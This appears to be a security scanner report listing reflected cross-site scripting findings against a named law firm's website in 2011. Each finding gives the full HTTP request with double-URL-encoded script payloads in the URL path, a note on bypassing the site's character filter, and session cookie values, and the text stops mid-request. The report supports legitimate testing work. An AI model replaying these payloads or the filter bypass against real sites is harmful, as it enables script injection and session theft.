The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 was submitted in the REST URL parameter 3. This input was echoed as f779c"><script>alert(1)</script>382088a8c20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.resizable.cssf779c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e382088a8c20 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10 was submitted in the REST URL parameter 1. This input was echoed as c2d5f"><script>alert(1)</script>87253ed8d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssc2d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e87253ed8d10/ui/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625 was submitted in the REST URL parameter 2. This input was echoed as 7d474"><script>alert(1)</script>1e1c925c625 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui7d474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1e1c925c625/ui.slider.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 was submitted in the REST URL parameter 3. This input was echoed as eb3ab"><script>alert(1)</script>de52d4ea844 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.slider.csseb3ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede52d4ea844 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48 was submitted in the REST URL parameter 1. This input was echoed as e5847"><script>alert(1)</script>63b9f9dcf48 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csse5847%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e63b9f9dcf48/ui/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.189. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
